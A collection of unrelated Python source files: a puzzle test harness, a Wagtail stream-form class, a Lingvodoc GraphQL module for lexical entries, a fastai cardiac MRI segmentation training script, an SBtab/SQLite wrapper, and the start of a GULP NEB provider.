test_res = [pool.apply_async(validate_test, case) for case in cases]
test_pass, do_p1, do_p2 = True, False, False
for test in test_res:
tp, dp1, dp2 = test.get(30)
test_pass &= tp
do_p1 |= dp1
do_p2 |= dp2
if test_pass:
p1, p2 = main_res.get(60)
assert do_p1 or do_p2, "Didn't run any tests"
assert p1 is None or do_p1 == True, "Got P1 value without 'do_p1' set"
assert p2 is None or do_p2 == True, "Got P2 value without 'do_p2' set"
assert p1 == 5995
assert p2 == 3202
print(f"p1 = {p1}\np2 = {p2}")
|
<gh_stars>10-100
# Credit to https://github.com/BertrandBordage for initial implementation
import copy
from collections import OrderedDict
from wagtail.contrib.forms.models import AbstractForm
from hypha.apply.funds.blocks import ApplicationMustIncludeFieldBlock
from .blocks import (
FormFieldBlock,
GroupToggleBlock,
GroupToggleEndBlock,
MultiInputCharFieldBlock,
TextFieldBlock,
)
from .forms import BlockFieldWrapper, PageStreamBaseForm
class BaseStreamForm:
submission_form_class = PageStreamBaseForm
@classmethod
def from_db(cls, db, field_names, values):
instance = super().from_db(db, field_names, values)
if 'form_data' in field_names:
instance.form_data = cls.deserialize_form_data(instance, instance.form_data, instance.form_fields)
return instance
@classmethod
def deserialize_form_data(cls, instance, form_data, form_fields):
data = form_data.copy()
# PERFORMANCE NOTE:
# Do not attempt to iterate over form_fields - that will fully instantiate the form_fields
# including any sub queries that they do
for i, field_data in enumerate(form_fields.raw_data):
block = form_fields.stream_block.child_blocks[field_data['type']]
field_id = field_data.get('id')
try:
value = data[field_id]
except KeyError:
pass
else:
data[field_id] = block.decode(value)
return data
def get_defined_fields(self):
return self.form_fields
def get_form_fields(self, draft=False, form_data={}):
form_fields = OrderedDict()
field_blocks = self.get_defined_fields()
group_counter = 1
is_in_group = False
# If true option 1 is selected
grouped_fields_visible = False
for struct_child in field_blocks:
block = struct_child.block
struct_value = struct_child.value
if isinstance(block, FormFieldBlock):
field_from_block = block.get_field(struct_value)
if draft and not issubclass(block.__class__, ApplicationMustIncludeFieldBlock):
field_from_block.required = False
field_from_block.help_link = struct_value.get('help_link')
field_from_block.group_number = group_counter if is_in_group else 1
if isinstance(block, GroupToggleBlock) and not is_in_group:
field_from_block.group_number = 1
field_from_block.grouper_for = group_counter + 1
group_counter += 1
is_in_group = True
grouped_fields_visible = form_data.get(struct_child.id) == field_from_block.choices[0][0]
if isinstance(block, TextFieldBlock):
field_from_block.word_limit = struct_value.get('word_limit')
if isinstance(block, MultiInputCharFieldBlock):
number_of_inputs = struct_value.get('number_of_inputs')
for index in range(number_of_inputs):
form_fields[struct_child.id + '_' + str(index)] = field_from_block
field_from_block.multi_input_id = struct_child.id
field_from_block.add_button_text = struct_value.get('add_button_text')
if index == number_of_inputs - 1: # Add button after last input field
field_from_block.multi_input_add_button = True
# Index for field until which fields will be visible to applicant.
# Initially only the first field with id UUID_0 will be visible.
field_from_block.visibility_index = 0
field_from_block.max_index = index
if index != 0:
field_from_block.multi_input_field = True
field_from_block.required = False
field_from_block.initial = None
field_from_block = copy.copy(field_from_block)
else:
if is_in_group and not isinstance(block, GroupToggleBlock):
field_from_block.required_when_visible = field_from_block.required
field_from_block.required = field_from_block.required & grouped_fields_visible
field_from_block.visible = grouped_fields_visible
form_fields[struct_child.id] = field_from_block
elif isinstance(block, GroupToggleEndBlock):
# Group toogle end block is used only to group fields and not used in actual form.
# Todo: Use streamblock to create nested form field blocks, a more elegant method to group form fields.
is_in_group = False
else:
field_wrapper = BlockFieldWrapper(struct_child)
field_wrapper.group_number = group_counter if is_in_group else 1
form_fields[struct_child.id] = field_wrapper
return form_fields
def get_form_class(self, draft=False, form_data={}):
return type('WagtailStreamForm', (self.submission_form_class,), self.get_form_fields(draft, form_data))
class AbstractStreamForm(BaseStreamForm, AbstractForm):
class Meta:
abstract = True
|
import graphene
import time
import string
import random
import logging
from lingvodoc.schema.gql_holders import (
LingvodocObjectType,
CompositeIdHolder,
AdditionalMetadata,
CreatedAt,
MarkedForDeletion,
Relationship,
MovedTo,
fetch_object,
client_id_check,
del_object,
acl_check_by_id,
ResponseError,
LingvodocID,
ObjectVal
)
from lingvodoc.models import (
Entity as dbEntity,
Field as dbField,
PublishingEntity as dbPublishingEntity,
Client,
DBSession,
Group as dbGroup,
LexicalEntry as dbLexicalEntry,
User as dbUser,
BaseGroup as dbBaseGroup
)
from lingvodoc.schema.gql_entity import Entity
from lingvodoc.views.v2.delete import real_delete_lexical_entry
from lingvodoc.utils.creation import create_lexicalentry
from lingvodoc.utils.deletion import real_delete_entity
from pyramid.security import authenticated_userid
from lingvodoc.utils.search import find_all_tags, find_lexical_entries_by_tags
from uuid import uuid4
# Setting up logging.
log = logging.getLogger(__name__)
class LexicalEntry(LingvodocObjectType):
"""
#created_at | timestamp without time zone | NOT NULL
#object_id | bigint | NOT NULL
#client_id | bigint | NOT NULL
#parent_object_id | bigint |
#parent_client_id | bigint |
#marked_for_deletion | boolean | NOT NULL
#moved_to | text |
#additional_metadata | jsonb |
"""
entities = graphene.List(Entity, mode=graphene.String())
dbType = dbLexicalEntry
gql_Entities = None
class Meta:
interfaces = (CompositeIdHolder, AdditionalMetadata, CreatedAt, MarkedForDeletion, Relationship, MovedTo)
@fetch_object('entities')
# @acl_check_by_id('view', 'lexical_entries_and_entities')
def resolve_entities(self, info, mode='all'):
if self.gql_Entities is not None:
return self.gql_Entities
if mode == 'all':
publish = None
accept = True
elif mode == 'published':
publish = True
accept = True
elif mode == 'not_accepted':
publish = None
accept = False
elif mode == 'deleted':
publish = None
accept = None
elif mode == 'all_with_deleted':
publish = None
accept = None
else:
raise ResponseError(message="mode: <all|published|not_accepted>")
result = list()
entities = DBSession.query(dbEntity, dbPublishingEntity).\
filter(dbEntity.parent_client_id == self.dbObject.client_id,
dbEntity.parent_object_id == self.dbObject.object_id,
dbEntity.client_id == dbPublishingEntity.client_id,
dbEntity.object_id == dbPublishingEntity.object_id)
if publish is not None:
entities = entities.filter(dbPublishingEntity.published == publish)
if accept is not None:
entities = entities.filter(dbPublishingEntity.accepted == accept)
entities = entities.filter(dbEntity.marked_for_deletion == False).yield_per(100)
def graphene_entity(cur_entity, cur_publishing):
ent = Entity(id = (cur_entity.client_id, cur_entity.object_id))
ent.dbObject = cur_entity
ent.publishingentity = cur_publishing
return ent
result = [graphene_entity(entity[0], entity[1]) for entity in entities]
# for db_entity in self.dbObject.entity:
# publ = db_entity.publishingentity
# if publish is not None and publ.published != publish:
# continue
# if accept is not None and publ.accepted != accept:
# continue
# if db_entity.marked_for_deletion:
# continue
# ent = Entity(id = [db_entity.client_id, db_entity.object_id])
# ent.dbObject = db_entity
# ent.publishingentity = publ
# result.append(ent)
return result
class CreateLexicalEntry(graphene.Mutation):
"""
example:
mutation {
create_lexicalentry(id: [949,21], perspective_id: [71,5]) {
field {
id
}
triumph
}
}
(this example works)
returns:
{
"create_lexicalentry": {
"field": {
"id": [
949,
21
]
},
"triumph": true
}
}
"""
class Arguments:
id = LingvodocID()
perspective_id = LingvodocID(required=True)
lexicalentry = graphene.Field(LexicalEntry)
triumph = graphene.Boolean()
@staticmethod
@client_id_check()
def mutate(root, info, **args):
perspective_id = args.get('perspective_id')
id = args.get('id')
client_id = id[0] if id else info.context["client_id"]
object_id = id[1] if id else None
id = [client_id, object_id]
info.context.acl_check('create', 'lexical_entries_and_entities', perspective_id)
dblexentry = create_lexicalentry(id, perspective_id, True)
"""
perspective_client_id = perspective_id[0]
perspective_object_id = perspective_id[1]
object_id = None
client_id_from_args = None
if len(id) == 1:
client_id_from_args = id[0]
elif len(id) == 2:
client_id_from_args = id[0]
object_id = id[1]
client_id = info.context["client_id"]
client = DBSession.query(Client).filter_by(id=client_id).first()
user = DBSession.query(dbUser).filter_by(id=client.user_id).first()
if not user:
raise ResponseError(message="This client id is orphaned. Try to logout and then login once more.")
perspective = DBSession.query(dbDictionaryPerspective). \
filter_by(client_id=perspective_client_id, object_id=perspective_object_id).first()
if not perspective:
raise ResponseError(message="No such perspective in the system")
if client_id_from_args:
if check_client_id(authenticated=client.id, client_id=client_id_from_args):
client_id = client_id_from_args
else:
raise ResponseError(message="Error: client_id from another user")
dblexentry = dbLexicalEntry(object_id=object_id, client_id=client_id,
parent_object_id=perspective_object_id, parent=perspective)
DBSession.add(dblexentry)
DBSession.flush()
"""
lexicalentry = LexicalEntry(id=[dblexentry.client_id, dblexentry.object_id])
lexicalentry.dbObject = dblexentry
return CreateLexicalEntry(lexicalentry=lexicalentry, triumph=True)
class DeleteLexicalEntry(graphene.Mutation):
"""
example:
mutation {
delete_lexicalentry(id: [949,21]) {
lexicalentry {
id
}
triumph
}
}
now returns:
{
"delete_lexicalentry": {
"lexicalentry": {
"id": [
949,
21
]
},
"triumph": true
}
}
"""
class Arguments:
id = LingvodocID(required=True)
triumph = graphene.Boolean()
@staticmethod
def mutate(root, info, **args):
lex_id = args.get('id')
client_id, object_id = lex_id
dblexicalentry = DBSession.query(dbLexicalEntry).filter_by(client_id=client_id, object_id=object_id).first()
if not dblexicalentry or dblexicalentry.marked_for_deletion:
raise ResponseError(message="Error: No such entry in the system")
info.context.acl_check('delete', 'lexical_entries_and_entities',
(dblexicalentry.parent_client_id, dblexicalentry.parent_object_id))
settings = info.context["request"].registry.settings
if 'desktop' in settings:
real_delete_lexical_entry(dblexicalentry, settings)
else:
del_object(dblexicalentry, "delete_lexicalentry", info.context.get('client_id'))
return DeleteLexicalEntry(triumph=True)
class BulkDeleteLexicalEntry(graphene.Mutation):
class Arguments:
ids = graphene.List(LingvodocID, required=True)
lexicalentry = graphene.Field(LexicalEntry)
triumph = graphene.Boolean()
@staticmethod
def mutate(root, info, **args):
ids = args.get('ids')
task_id = str(uuid4())
for lex_id in ids:
client_id, object_id = lex_id
dblexicalentry = DBSession.query(dbLexicalEntry).filter_by(client_id=client_id, object_id=object_id).first()
if not dblexicalentry or dblexicalentry.marked_for_deletion:
raise ResponseError(message="Error: No such entry in the system")
info.context.acl_check('delete', 'lexical_entries_and_entities',
(dblexicalentry.parent_client_id, dblexicalentry.parent_object_id))
settings = info.context["request"].registry.settings
if 'desktop' in settings:
real_delete_lexical_entry(dblexicalentry, settings)
else:
del_object(dblexicalentry, "bulk_delete_lexicalentry",
info.context.get('client_id'), task_id=task_id, counter=len(ids))
return DeleteLexicalEntry(triumph=True)
def create_n_entries_in_persp(n, pid, client):
lexentries_list = list()
client = client
for i in range(0, n):
id = [client.id, None]
perspective_id = pid
dblexentry = create_lexicalentry(id, perspective_id, True)
lexentries_list.append(dblexentry)
DBSession.bulk_save_objects(lexentries_list)
DBSession.flush()
result = list()
for lexentry in lexentries_list:
result.append(LexicalEntry(id=[lexentry.client_id, lexentry.object_id]))
result[-1].dbObject = lexentry
return result
class BulkCreateLexicalEntry(graphene.Mutation):
class Arguments:
lexicalentries = graphene.List(ObjectVal)
triumph = graphene.Boolean()
@staticmethod
def mutate(root, info, **args):
lexicalentries = args.get('lexicalentries')
lexentries_list = list()
client = DBSession.query(Client).filter_by(id=info.context["client_id"]).first()
if not client:
raise KeyError("Invalid client id (not registered on server). Try to logout and then login.",
info.context["client_id"])
for lexentry in lexicalentries:
id = lexentry["id"]
perspective_id = lexentry["perspective_id"]
dblexentry = create_lexicalentry(id, perspective_id, False)
lexentries_list.append(dblexentry)
DBSession.bulk_save_objects(lexentries_list)
DBSession.flush()
return BulkCreateLexicalEntry(triumph=True)
class ConnectLexicalEntries(graphene.Mutation):
class Arguments:
connections = graphene.List(LingvodocID, required = True)
field_id = LingvodocID(required=True)
tag = graphene.String()
triumph = graphene.Boolean()
@staticmethod
@client_id_check()
def mutate(root, info, **args):
client = DBSession.query(Client).filter_by(id=info.context["client_id"]).first()
user = DBSession.query(dbUser).filter_by(id=client.user_id).first()
tags = list()
tag = args.get('id')
if tag is not None:
tags.append(tag)
# if 'tag' in req:
# tags.append(req['tag'])
field_id = args['field_id']
field = DBSession.query(dbField).\
filter_by(client_id=field_id[0], object_id=field_id[1]).first()
if not field:
raise ResponseError('No such field in the system')
if field.data_type != 'Grouping Tag':
raise ResponseError("wrong field data type")
connections = args['connections']
for par in connections:
parent = DBSession.query(dbLexicalEntry).\
filter_by(client_id=par[0], object_id=par[1]).first()
if not parent:
raise ResponseError("No such lexical entry in the system")
par_tags = find_all_tags(parent, field_id[0], field_id[1], False, False)
for tag in par_tags:
if tag not in tags:
tags.append(tag)
if not tags:
n = 10 # better read from settings
tag = time.ctime() + ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits)
for c in range(n))
tags.append(tag)
lexical_entries = find_lexical_entries_by_tags(tags, field_id[0], field_id[1], False, False)
for par in connections:
parent = DBSession.query(dbLexicalEntry).\
filter_by(client_id=par[0], object_id=par[1]).first()
if parent not in lexical_entries:
lexical_entries.append(parent)
# Override create permission check, depends only on the user.
# Admin is assumed to have all permissions.
create_override_flag = (user.id == 1)
if not create_override_flag:
group = DBSession.query(dbGroup).join(dbBaseGroup).filter(
dbBaseGroup.subject == 'lexical_entries_and_entities',
dbGroup.subject_override == True,
dbBaseGroup.action == 'create').one()
create_override_flag = (
user.is_active and user in group.users)
create_flag_dict = {}
for lex in lexical_entries:
create_flag = create_override_flag
# Create permission check, depends on the perspective of the lexical entry.
if not create_flag:
perspective_id = (
lex.parent_client_id, lex.parent_object_id)
if perspective_id in create_flag_dict:
create_flag = create_flag_dict[perspective_id]
else:
group = DBSession.query(dbGroup).join(dbBaseGroup).filter(
dbBaseGroup.subject == 'lexical_entries_and_entities',
dbGroup.subject_client_id == perspective_id[0],
dbGroup.subject_object_id == perspective_id[1],
dbBaseGroup.action == 'create').one()
create_flag = (
user.is_active and user in group.users)
create_flag_dict[perspective_id] = create_flag
# Ensuring that the lexical entry has all link tags.
for tag in tags:
tag_entity = DBSession.query(dbEntity) \
.join(dbEntity.field) \
.join(dbEntity.publishingentity) \
.filter(dbEntity.parent == lex,
dbField.client_id == field_id[0],
dbField.object_id == field_id[1],
dbEntity.content == tag,
dbEntity.marked_for_deletion == False).first()
if not tag_entity:
tag_entity = dbEntity(
client_id = client.id,
field = field,
content = tag,
parent = lex)
if create_flag:
tag_entity.publishingentity.accepted = True
# If we are the admin, we automatically publish link entities.
if user.id == 1:
tag_entity.publishingentity.published = True
return ConnectLexicalEntries(triumph=True)
class DeleteGroupingTags(graphene.Mutation):
class Arguments:
id = LingvodocID(required=True)
field_id = LingvodocID(required=True)
triumph = graphene.Boolean()
@staticmethod
@acl_check_by_id('delete', 'lexical_entries_and_entities', id_key= "parent_id")
def mutate(root, info, **args):
"""
mutation DeleteTag{
delete_grouping_tags(field_id: [66,25]
id:[1523, 9499]
) {
triumph
}
}
"""
settings = info.context["request"].registry.settings
request = info.context.request
variables = {'auth': authenticated_userid(request)}
client = DBSession.query(Client).filter_by(id=variables['auth']).first()
user = DBSession.query(dbUser).filter_by(id=client.user_id).first()
tags = list()
client_id, object_id = args.get("id")
field_client_id, field_object_id = args.get("field_id")
field = DBSession.query(dbField).filter_by(client_id=field_client_id,
object_id=field_object_id).first()
if not field:
return {'error': str("No such field in the system")}
elif field.data_type != 'Grouping Tag':
return {'error': str("Wrong type of field")}
entities = DBSession.query(dbEntity).filter_by(field_client_id=field_client_id,
field_object_id=field_object_id,
parent_client_id=client_id,
parent_object_id=object_id, marked_for_deletion=False).all()
if entities:
for dbentity in entities:
if 'desktop' in settings:
real_delete_entity(dbentity, settings)
else:
del_object(dbentity, "delete_grouping_tags", info.context.get('client_id'))
# entity.marked_for_deletion = True
# objecttoc = DBSession.query(dbObjectTOC).filter_by(client_id=entity.client_id,
# object_id=entity.object_id).one()
# objecttoc.marked_for_deletion = True
return DeleteGroupingTags(triumph=True)
return DeleteGroupingTags(triumph=False)
|
#!/usr/bin/env python
# coding: utf-8
import argparse
from fastai.vision import *
from tqdm import tqdm
from pathlib import Path
import pandas as pd
import os
import sys
from fastai.callbacks import CSVLogger
# suppress anoying and irrelevant warning, see https://forums.fast.ai/t/warnings-when-trying-to-make-an-imagedatabunch/56323/9
import warnings
warnings.filterwarnings("ignore", category=UserWarning, module="torch.nn.functional")
parser = argparse.ArgumentParser()
parser.add_argument('--size', dest='size', help='scale images to size', default=256, type=int)
parser.add_argument('--bs', dest='bs', help='batch size', default=32, type=int)
parser.add_argument('--cuda_device', dest='cuda_device', help='cuda device index', default=0, type=int)
parser.add_argument('--confidence', dest='confidence', help='confidence cutoff in percent', default=10, type=int)
parser.add_argument('--model', dest='model', help='model, one of resnet34, resnet50, vgg16', default='resnet34', type=str)
parser.add_argument('--tfms', dest='tfms', help='transformations, one of the presets no, normal, extreme', default='normal', type=str)
parser.add_argument('--loss', dest='loss', help='loss function, one of the presets ce, focal, softdice', default='ce', type=str)
args = parser.parse_args()
our_models = {"resnet34": models.resnet34, "resnet50": models.resnet50, "vgg16": models.vgg16_bn}
our_tfms = {
"no": None,
"normal": get_transforms(do_flip=False,max_rotate=20,max_lighting=.4,max_zoom=1.2),
"extreme": get_transforms(do_flip=True,max_rotate=90,max_lighting=.4,max_zoom=1.2)
}
if args.loss not in ["ce", "focal", "softdice"]:
sys.exit("Unknown loss function")
size = args.size
bs = args.bs
cuda_device = args.cuda_device
confidence_cutoff = args.confidence/100
model = our_models[args.model]
tfms = our_tfms[args.tfms]
name = "noPretrain_{}_{}percent_size{}_{}Tfms_{}Loss".format(args.model,args.confidence,size,args.tfms,args.loss)
torch.cuda.set_device(cuda_device)
os.mkdir(name)
get_y_fn = lambda x: str(x).replace("images", "masks_2class")
imgList = pd.read_csv("nifti/image_list_filtered_score.tsv", sep="\t")
filteredList = imgList[imgList.score<=confidence_cutoff]
src = (SegmentationItemList.from_df(filteredList,path="nifti",cols="file")
.split_from_df(col='is_val')
.label_from_func(get_y_fn, classes=np.array(["background","left_ventricle","myocardium"])))
data = (src.transform(tfms,size=size,padding_mode="zeros",resize_method=ResizeMethod.PAD,tfm_y=True)
.databunch(bs=bs)
.normalize(imagenet_stats))
def acc_seg(input, target):
target = target.squeeze(1)
return (input.argmax(dim=1)==target).float().mean()
def multi_dice(input:Tensor, targs:Tensor, class_id=0, inverse=False)->Rank0Tensor:
n = targs.shape[0]
input = input.argmax(dim=1).view(n,-1)
# replace all with class_id with 1 all else with 0 to have binary case
output = (input == class_id).float()
# same for targs
targs = (targs.view(n,-1) == class_id).float()
if inverse:
output = 1 - output
targs = 1 - targs
intersect = (output * targs).sum(dim=1).float()
union = (output+targs).sum(dim=1).float()
res = 2. * intersect / union
res[torch.isnan(res)] = 1
return res.mean()
dice0inv = partial(multi_dice, class_id=0, inverse=True)
dice1 = partial(multi_dice, class_id=1)
dice2 = partial(multi_dice, class_id=2)
dice0inv.__name__ = 'diceComb'
dice1.__name__ = 'diceLV'
dice2.__name__ = 'diceMY'
class SoftDiceLoss(nn.Module):
'''
WARNING: this implementation does not work in our case, assumes one hot and channel last - need to restructure or re-write
Soft dice loss calculation for arbitrary batch size, number of classes, and number of spatial dimensions.
Assumes the `channels_last` format.
# Arguments
targets: b x X x Y( x Z...) x c One hot encoding of ground truth
inputs: b x X x Y( x Z...) x c Network output, must sum to 1 over c channel (such as after softmax)
epsilon: Used for numerical stability to avoid divide by zero errors
# References
https://www.jeremyjordan.me/semantic-segmentation/ (https://gist.github.com/jeremyjordan/9ea3032a32909f71dd2ab35fe3bacc08#file-soft_dice_loss-py)
V-Net: Fully Convolutional Neural Networks for Volumetric Medical Image Segmentation
https://arxiv.org/abs/1606.04797
More details on Dice loss formulation
https://mediatum.ub.tum.de/doc/1395260/1395260.pdf (page 72)
Adapted from https://github.com/Lasagne/Recipes/issues/99#issuecomment-347775022
'''
def __init__(self, epsilon=1e-8):
super().__init__()
self.epsilon = epsilon
def forward(self, inputs, targets):
# skip the batch and class axis for calculating Dice score
print(inputs.shape)
print(inputs)
print(targets.shape)
print(targets)
axes = tuple(range(1, len(inputs.shape)-1))
numerator = 2. * np.sum(inputs * targets, axes)
denominator = np.sum(np.square(inputs) + np.square(targets), axes)
return 1 - np.mean(numerator / (denominator + self.epsilon)) # average over classes and batch
# adjusted from https://forums.fast.ai/t/loss-function-of-unet-learner-flattenedloss-of-crossentropyloss/51605
class FocalLoss(nn.Module):
def __init__(self, gamma=2., reduction='mean'):
super().__init__()
self.gamma = gamma
self.reduction = reduction
def forward(self, inputs, targets):
CE_loss = CrossEntropyFlat(axis=1,reduction='none')(inputs, targets)
pt = torch.exp(-CE_loss)
F_loss = ((1 - pt)**self.gamma) * CE_loss
if self.reduction == 'sum':
return F_loss.sum()
elif self.reduction == 'mean':
return F_loss.mean()
learn = unet_learner(data, model, pretrained=False, metrics=[acc_seg,dice0inv,dice1,dice2], callback_fns=[partial(CSVLogger, append=True, filename="train_log")], path=name)
if args.loss == "focal":
learn.loss_func = FocalLoss()
if args.loss == "softdice":
learn.loss_func = SoftDiceLoss()
learn.unfreeze()
lr_find(learn)
fig = learn.recorder.plot(return_fig=True)
fig.savefig(name+"/lrfind_unfreeze.png")
lr=1e-5
learn.fit_one_cycle(5, lr)
learn.save(name+'-unfreeze-5')
fig = learn.recorder.plot_losses(return_fig=True)
fig.savefig(name+"/unfreeze-5.png")
learn.fit_one_cycle(10, lr)
learn.save(name+'-unfreeze-15')
fig = learn.recorder.plot_losses(return_fig=True)
fig.savefig(name+"/unfreeze-15.png")
learn.fit_one_cycle(15, lr)
learn.save(name+'-unfreeze-30')
fig = learn.recorder.plot_losses(return_fig=True)
fig.savefig(name+"/unfreeze-30.png")
learn.export('model.pkl')
# Make Predictions
fullImgList = pd.read_csv("nifti/image_list.tsv", sep="\t", header=None, names=["pid","file"])
pixelTable = pd.DataFrame({'file': [], 'lv_pixels': [], 'my_pixels': []})
for i in tqdm(range(int(fullImgList.shape[0]/10000)+1)):
imgInBatch = fullImgList[(10000*i):(10000*(i+1))]
trainedModel = load_learner(name, 'model.pkl')
trainedModel.data.add_test(SegmentationItemList.from_df(imgInBatch,path="nifti",cols="file"), tfm_y=False)
predictions,_=trainedModel.get_preds(DatasetType.Test)
predictions = predictions.argmax(dim=1)
lv_pixels = (predictions==1).sum(dim=(1,2))
my_pixels = (predictions==2).sum(dim=(1,2))
pixelTable = pd.concat([pixelTable, pd.DataFrame({'file': trainedModel.data.test_ds.items, 'lv_pixels': lv_pixels, 'my_pixels': my_pixels})])
pixelTable.to_csv(name+"/predictions.tsv",sep="\t",index=False)
|
"""
tablib.dictionary.sbtab_dict
~~~~~~~~~~~~~
A wrapper object for handling an SBtab with multiple tables using
a dictionary.
Also, includes methods for I/O between SQLite and SBtab.
"""
# -*- coding: utf-8 -*-
import misc
from SBtab import SBtabTable, SBtabError
import tablib
import tablibIO
import sqlite3
class SBtabDict(dict):
def __init__(self, sbtab_list):
"""
Arguments:
sbtab_list - a list of SBtabTable objects
"""
self.fpath = ''
self.sbtab_list = sbtab_list
for m in sbtab_list:
self[m.table_name] = m
@staticmethod
def FromSBtab(fpath):
spreadsheet_file = tablibIO.loadTSV(fpath, False)
m = misc.split_sbtabs(spreadsheet_file)
sbtab_list = [SBtabTable(dset, fpath) for dset in m]
sbtab_dict = SBtabDict(sbtab_list)
sbtab_dict.fpath = fpath
return sbtab_dict
def GetColumnFromTable(self, table_name, column_name):
"""
Returns:
a list of the values in the column called 'column_name'
in the table 'table_name'
"""
column_index = self[table_name].columns_dict['!' + column_name]
rows = self[table_name].getRows()
return [r[column_index] for r in rows]
def GetColumnsFromTable(self, table_name, column_names):
"""
Arguments:
table_name - the name of the table in the SBtab file (without '!!')
column_names - a list of column names from which to get the data (without '!')
Returns:
a list of lists containing the values corresponding to the
columns in 'column_names' in the table 'table_name'
"""
try:
idxs = [self[table_name].columns_dict['!' + c] for c in column_names]
except KeyError as e:
all_columns = ', '.join(self[table_name].columns_dict.keys())
raise KeyError('Cannot find the column %s in table "%s" in file %s. '
'Columns are: %s'
% (e, table_name, self.fpath, all_columns))
return [map(r.__getitem__, idxs) for r in self[table_name].getRows()]
def GetDictFromTable(self, table_name, key_column_name, value_column_name,
value_mapping=None):
column_names = [key_column_name, value_column_name]
keys, vals = zip(*self.GetColumnsFromTable(table_name, column_names))
return dict(zip(keys, map(value_mapping, vals)))
def GetTableAttribute(self, table_name, attribute_name):
"""
Arguments:
table_name - the name of the table in the SBtab file (without '!!')
attribute_name - a string with the attribute name
Returns:
A string containing the value of the attribute in that table,
or None if the attribute does not exist
"""
try:
return self[table_name].getCustomTableInformation(attribute_name)
except SBtabError:
return None
def SBtab2SQL(self, comm, append=False):
comm.execute("CREATE TABLE IF NOT EXISTS __tables__ (TableName TEXT, TableType TEXT, "
"header TEXT)")
comm.execute("CREATE TABLE IF NOT EXISTS __columns__ (TableName TEXT, idx INT, ColumnName TEXT)")
for m in self.sbtab_list:
# get the names of the columns in the right order (i.e. so that
# the corresponding column indices will be 0..n)
columns = sorted(m.columns, key=m.columns_dict.get)
columns = map(lambda c: str(c[1:]), columns)
columns = [c for c in columns if c != '']
rows = list(comm.execute("SELECT * FROM __tables__ "
"WHERE TableName = '%s'" % m.table_name))
if len(rows) > 0:
# if the table already exists, make sure that the metadata is
# the same as in the SBtab.
tname, ttype, theader = rows[0]
assert ttype == m.table_type
assert theader == m._getHeaderRow()
# TODO: also assert that the columns are exactly the same as before
if not append:
comm.execute("DROP TABLE %s" % m.table_name)
else:
# if the table doesn't already exist, add an entries for it
# in the __tables__ and __columns__
comm.execute("INSERT INTO __tables__ VALUES(?,?,?)",
[m.table_name, m.table_type, m._getHeaderRow()])
for i, col in enumerate(columns):
comm.execute("INSERT INTO __columns__ VALUES(?,?,?)",
[m.table_name, i, col])
col_text = ','.join(['\'%s\' TEXT' % col for col in columns])
comm.execute("CREATE TABLE IF NOT EXISTS %s (%s)" % (m.table_name, col_text))
# copy the data from the SBtab table into the relevant table in the
# database.
ins_command = "INSERT INTO %s VALUES(%s)" % \
(m.table_name, ','.join(["?"]*len(columns)))
for i, row in enumerate(m.getRows()):
if len(row) > len(columns):
row = row[0:len(columns)]
comm.execute(ins_command, row)
comm.commit()
@staticmethod
def FromSQLite(fpath):
"""
Read all tables from a SQL database into an SBtab object.
This function assumed that the database has one table
called __tables__ with the relevant header fields for SBtab
"""
comm = sqlite3.connect(fpath)
assert list(comm.execute("SELECT name FROM sqlite_master WHERE name='__tables__'")) != []
table_names, table_types, headers = \
zip(*comm.execute("SELECT TableName, TableType, header from __tables__"))
sbtabs = []
for table_name, header in zip(table_names, headers):
columns = []
for c in comm.execute("SELECT ColumnName from __columns__ WHERE "
"TableName == '%s' ORDER BY idx" % table_name):
columns.append(c[0])
sbtab = tablib.Dataset()
sbtab.rpush([header] + [''] * (len(columns)-1))
sbtab.rpush(map(lambda s: '!' + s, columns))
for row in comm.execute("SELECT * FROM '%s'" % table_name):
sbtab.append(row)
sbtabs.append(sbtab)
sbtab_list = [SBtabTable(dset, fpath) for dset in sbtabs]
sbtab_dict = SBtabDict(sbtab_list)
sbtab_dict.fpath = fpath
comm.close()
return sbtab_dict
|
"""Provides specific NEB provider implementations (e.g. GULP and VASP), freeing users from such complexities.
"""
import os
import subprocess as sb # run()
from PyLib.TinyParser import TinyParser
from Errors import AppError
class GulpNEBProvider:
class GinFileTemplate:
"""After initialisation with a model GULP .gin input file, the object becomes template for creating .gin files.
"""
def __init__(self,sExistingAtomTyperGinFilePath,iNumGuestAtoms):
"""Initialise object.
[sExistingAtomTyperGinFilePath]: string, existing GULP .gin file name and path.
[iNumGuestAtoms]: int, number of guest atoms.
"""
self.sGinFileHeaderAndHostAtomData=None # top of .gin file
self.lsGuestAtomLabelsAndSpeciesTypes=[] # list of guest atom labels and species-types
self.sGinFileBondsSpeciesAndLibraryContent=None # bottom of .gin file
self.ParseGinFile(sExistingAtomTyperGinFilePath,iNumGuestAtoms)
def ParseGinFile(self,sExistingAtomTyperGinFilePath,iNumGuestAtoms):
"""Parse everything but the guest molecule coordinates from the GULP .gin input file.
Expect AtomTyper-created .gin file in following format:
<header-lines>
vectors
<lattice-vector-lines>
cartesian
<atom-data(host)>+
<atom-data(guest)>+
connect ...
where <atom-data>:= <atom-label> <species-type> <position-x> <position-y> <position-z>
[sExistingAtomTyperGinFilePath]: string, existing GULP .gin file name and path.
[iNumGuestAtoms]: int, number of guest atoms.
"""
# 1. move to last guest atom data
parser= TinyParser(None,sExistingAtomTyperGinFilePath)
parser.Anchor()
parser.MoveTo("\nvectors",1) # moving initially beyond 'vectors' is a risk-reduction tactic
parser.MoveTo("\nconnect",0) # now jump to 'connect'
self.sGinFileBondsSpeciesAndLibraryContent= parser.sContent[parser.iThisChar+1:] # keep bottom half of .gin file
parser.Step(-1)
while parser.sContent[parser.iThisChar].isspace(): parser.Step(-1) # rid any prior space or newlines
# 2. now on <position-z> of last guest atom; for N guest atoms, want to find N prior \n 's
for iThisGuestAtom in range(iNumGuestAtoms): parser.MoveTo("\n",-1,bReverse=True) # each move sets position just before newline
parser.Step(2) # step over newline to first guest atom
self.sGinFileHeaderAndHostAtomData= parser.Copy() # keep top half of .gin file
# 3. read atom label and species type
for iThisGuestAtom in range(iNumGuestAtoms):
sAtomLabel= parser.EatWord()
parser.EatSpace()
sSpeciesType= parser.EatWord() # 'core', 'shell', 'bcor', 'bshe' - see GULP 6.0 manual PDF, p.134
self.lsGuestAtomLabelsAndSpeciesTypes.append( (sAtomLabel,sSpeciesType) )
parser.EatLine()
def Render(self,lsGuestAtomCartesPositions):
"""Render the .gin file.
Loading .gin files calculated earlier has two principal benefits:
1. on examining a host-guest crystal, AtomTyper creates *guest-position dependent* bonds and atomtypes. As free guest trajectories are sought, any underisable bond/atomtype changes lead to inconsistent energy calculations, i.e. for the energy barrier as guests move through the channel and window position. Fixing host-guest bonds/atomtypes excludes such changes to focus on the primary goal of seeking free guest trajectories.
